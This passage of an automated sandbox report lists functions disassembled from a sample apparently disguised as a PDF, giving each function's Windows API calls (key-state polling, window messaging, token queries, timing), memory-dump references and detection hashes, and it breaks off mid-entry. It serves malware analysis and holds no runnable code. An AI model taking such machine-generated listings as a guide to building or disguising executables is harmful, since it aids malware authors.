                                    Function 00FB2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00FB2357
                                    • ScreenToClient.USER32(010767B0,?), ref: 00FB2374
                                    • GetAsyncKeyState.USER32(00000001), ref: 00FB2399
                                    • GetAsyncKeyState.USER32(00000002), ref: 00FB23A7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 61a968ccd570f2b6eb38d1611e319fd6ab7e9fd875c54e75d3ce2783986790c7
                                    • Instruction ID: 5d8a91dddef6fc8c78cd9ec1048c7ad7181dc9a644c27fb1ac79e338273a03f7
                                    • Opcode Fuzzy Hash: 61a968ccd570f2b6eb38d1611e319fd6ab7e9fd875c54e75d3ce2783986790c7
                                    • Instruction Fuzzy Hash: D841B235904155FBCF159F69C844AEDBBB4FB45330F104319F96892290C7355990EF91
                                    Function 01006920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0100695D
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 010069A9
                                    • TranslateMessage.USER32(?), ref: 010069D2
                                    • DispatchMessageW.USER32(?), ref: 010069DC
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010069EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                    • String ID:
                                    • API String ID: 2108273632-0
                                    • Opcode ID: 8f8daa4a8afeb225e9197b9a6d575271c5c036e034177a42f8ed140fa726faa3
                                    • Instruction ID: e6631b22d2b02b8c9c5778332f223d8e209c0cabb987bee83617cf90de870e74
                                    • Opcode Fuzzy Hash: 8f8daa4a8afeb225e9197b9a6d575271c5c036e034177a42f8ed140fa726faa3
                                    • Instruction Fuzzy Hash: DA31F6719006079AFBB2DE79D844FF67BEDAB02300F0041A5E0E2D34D5E72B9096CB50
                                    Function 01008F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 01008F12
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 01008FBC
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01008FC4
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 01008FD2
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01008FDA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: c89ad23c83ae90a76ad246206623a9645788f4bdadaa36ce5d17cebe87b4b59c
                                    • Instruction ID: cc473d3dc8c0d93b05fb157d1d50f1eb3960d4c0306eac690eb6adb5aef28049
                                    • Opcode Fuzzy Hash: c89ad23c83ae90a76ad246206623a9645788f4bdadaa36ce5d17cebe87b4b59c
                                    • Instruction Fuzzy Hash: 0A31E07190021AEFEB15CF78D94CAAE7BB6FB04315F00825AFAA4E61D1C3B09914DB91
                                    Function 0100B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0100B6C7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0100B6E4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0100B71C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0100B742
                                    • _wcsstr.LIBCMT ref: 0100B74C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: 8baa882b2559dc055503f3e9e53fbc4ac0414d9a32a263a0784192c1d41c6cea
                                    • Instruction ID: 3ba17386b3de0eeb823ee68e9275f16e2a39cd1e27c76a723f36ab8cc338cb6d
                                    • Opcode Fuzzy Hash: 8baa882b2559dc055503f3e9e53fbc4ac0414d9a32a263a0784192c1d41c6cea
                                    • Instruction Fuzzy Hash: A3212935604204BBFB266B399C49E7B7BDDEF49750F04406AFC49CA2D1EF65C840A3A1
                                    Function 0103B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103B44C
                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0103B471
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0103B489
                                    • GetSystemMetrics.USER32(00000004), ref: 0103B4B2
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01021184,00000000), ref: 0103B4D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    • Opcode ID: 95560baf6982c434d519f3c8a6e24cae129aeb610ff930efdd2fa8ba41c11d16
                                    • Instruction ID: 630d9409e53babb69a32adde96b426787c8897888ab0e45f8dc756fe7edb72ea
                                    • Opcode Fuzzy Hash: 95560baf6982c434d519f3c8a6e24cae129aeb610ff930efdd2fa8ba41c11d16
                                    • Instruction Fuzzy Hash: 3B21F771910216AFDB608E3CDC04B6A3BE8FB45724F104768FEA6D71D1EB319810CB84
                                    Function 010097E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01009802
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01009834
                                    • __itow.LIBCMT ref: 0100984C
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01009874
                                    • __itow.LIBCMT ref: 01009885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow$_memmove
                                    • String ID:
                                    • API String ID: 2983881199-0
                                    • Opcode ID: 5407f16d9b1288c14a0eb685b3a5231f35b439ee86b2ab2d22bf13fccb1fdf65
                                    • Instruction ID: 9e85f260bcf92cfaf021c18dd211a5d49d18b2400c48511653be70c575691b19
                                    • Opcode Fuzzy Hash: 5407f16d9b1288c14a0eb685b3a5231f35b439ee86b2ab2d22bf13fccb1fdf65
                                    • Instruction Fuzzy Hash: 8D21C831B00205EBFB11AA758C86EEE7BBDDF48714F040069FA48DB392D6759A419792
                                    Function 00FB12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB134D
                                    • SelectObject.GDI32(?,00000000), ref: 00FB135C
                                    • BeginPath.GDI32(?), ref: 00FB1373
                                    • SelectObject.GDI32(?,00000000), ref: 00FB139C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 7227f32c03e5b055eb6ffee7d175d05763fb9e2cf7d53d90099f78e15456fef4
                                    • Instruction ID: 1a7b6805cdb5269270b7ea555687b2ce3258d766e74c12b36e48e947ea87821f
                                    • Opcode Fuzzy Hash: 7227f32c03e5b055eb6ffee7d175d05763fb9e2cf7d53d90099f78e15456fef4
                                    • Instruction Fuzzy Hash: C22186B1C00705EFEB208F66D8447A97BF8FB00321F684316F491A6194E77B9995EF91
                                    Function 0100C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 8aa1b62f7ca0d914731bac63440de7e314a92b59230db75fa9227654b0ab83b5
                                    • Instruction ID: 2353677a9ffd98d880280c6f98d9212af3e24c6469f551348944e170cb701bbb
                                    • Opcode Fuzzy Hash: 8aa1b62f7ca0d914731bac63440de7e314a92b59230db75fa9227654b0ab83b5
                                    • Instruction Fuzzy Hash: FF01DDB170410A7BF206A9256E82FEF779DEF12294F084165FD44973C3EB54DE1582E4
                                    Function 01014D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 01014D5C
                                    • __beginthreadex.LIBCMT ref: 01014D7A
                                    • MessageBoxW.USER32(?,?,?,?), ref: 01014D8F
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01014DA5
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01014DAC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                    • String ID:
                                    • API String ID: 3824534824-0
                                    • Opcode ID: 74c2cf352414b81fdb4e5322ffd3ddea701e3f283286a48c4af1427f03f9d733
                                    • Instruction ID: 0dac35ae52946f54e752b684c683ebe82394bfba358f636b08904eeb4e054457
                                    • Opcode Fuzzy Hash: 74c2cf352414b81fdb4e5322ffd3ddea701e3f283286a48c4af1427f03f9d733
                                    • Instruction Fuzzy Hash: D31148B2D04605BBDB21ABAC9C48ADE7FACEB46320F144259F998D3244D77E880087A1
                                    Function 0100874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01008766
                                    • GetLastError.KERNEL32(?,0100822A,?,?,?), ref: 01008770
                                    • GetProcessHeap.KERNEL32(00000008,?,?,0100822A,?,?,?), ref: 0100877F
                                    • HeapAlloc.KERNEL32(00000000,?,0100822A,?,?,?), ref: 01008786
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100879D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 842720411-0
                                    • Opcode ID: 78f46cb5a438e2d15d2a02800591c306b42f00b9ff0c271c0730df3284db0913
                                    • Instruction ID: 402ca5105886658aefcabcf75f29750f120989ce7f117baf11a61ad1394c422c
                                    • Opcode Fuzzy Hash: 78f46cb5a438e2d15d2a02800591c306b42f00b9ff0c271c0730df3284db0913
                                    • Instruction Fuzzy Hash: 9B016271A00215BFEB255FBADC48D6B7FACFF8A255B104469F989C2154D632CC10DB61
                                    Function 010154E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01015502
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01015510
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01015518
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01015522
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: eb24aa210d4065e081dc6a0799ed1a86052e34b67085d1264094213e11c51e50
                                    • Instruction ID: 280d49b9ac83def8d19bf9fa0264486b1eaa8b6ba548789520e42cec62ccf781
                                    • Opcode Fuzzy Hash: eb24aa210d4065e081dc6a0799ed1a86052e34b67085d1264094213e11c51e50
                                    • Instruction Fuzzy Hash: 4D016D35D0061ADBCF10EFE8EC986EDBB79FB4A711F440086E981F6148DB395554C7A2
                                    Function 01007652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?,?,0100799D), ref: 0100766F
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 0100768A
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 01007698
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?), ref: 010076A8
                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 010076B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: 774026793fbeb166c5ed920158fd9c9c008db66356c0388ede961f64a367fedc
                                    • Instruction ID: 5c1fb9cb53d22a8e9aa338fafd794f0a4350e7e96f3ebb8c2fe3ae1ffbddf180
                                    • Opcode Fuzzy Hash: 774026793fbeb166c5ed920158fd9c9c008db66356c0388ede961f64a367fedc
                                    • Instruction Fuzzy Hash: AB01D47AA00215BBEB214F18DC04BAA7FECEB48651F100019FEC6D2255E73AED408BB0
                                    Function 010085F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01008608
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01008612
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01008621
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01008628
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0100863E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: e9ace506ba9372b176e1e0facb80ff7e8fb0032c12bfa5551f73d27d468ceec6
                                    • Instruction ID: f5ebe36b58560af4c9cd7c5f5a5acc5aa3e5e4e92c49f6e36b9aa914974d0f9d
                                    • Opcode Fuzzy Hash: e9ace506ba9372b176e1e0facb80ff7e8fb0032c12bfa5551f73d27d468ceec6
                                    • Instruction Fuzzy Hash: 2CF06831601205AFF7211FA9DC8DE6B3FACFF4A654F004456F585C6190C775D845DB61
                                    Function 01008652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01008669
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01008673
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01008682
                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01008689
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0100869F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: cee6d02a6a790566077d38be34d7cf6dbdeda368868dfd54a8ebcc0a665a950b
                                    • Instruction ID: cc555853614287d1bf658c3affe6439b1ca88487f5e893e7ae13c0f453cb0569
                                    • Opcode Fuzzy Hash: cee6d02a6a790566077d38be34d7cf6dbdeda368868dfd54a8ebcc0a665a950b
                                    • Instruction Fuzzy Hash: 6FF0AF70600205AFEB221EA9EC88E673FACFF8A654F100016F985D2180CA66D804DF62
                                    Function 0100C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 0100C6BA
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0100C6D1
                                    • MessageBeep.USER32(00000000), ref: 0100C6E9
                                    • KillTimer.USER32(?,0000040A), ref: 0100C705
                                    • EndDialog.USER32(?,00000001), ref: 0100C71F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 71ed48e2c07f0b7ebab526b0989a2834e150d22d76b04b260bd79b33dac009a8
                                    • Instruction ID: 38ff2bf1b554b6155d4a0016f97fb14fd02eebec5e2225459e6f671cb0de4250
                                    • Opcode Fuzzy Hash: 71ed48e2c07f0b7ebab526b0989a2834e150d22d76b04b260bd79b33dac009a8
                                    • Instruction Fuzzy Hash: 0101843080070597FB325B24DD4EB967BBCBB04701F000699B6C6A10D1DBE565548B41
                                    Function 00FB13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 00FB13BF
                                    • StrokeAndFillPath.GDI32(?,?,00FEBAD8,00000000,?), ref: 00FB13DB
                                    • SelectObject.GDI32(?,00000000), ref: 00FB13EE
                                    • DeleteObject.GDI32 ref: 00FB1401
                                    • StrokePath.GDI32(?), ref: 00FB141C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
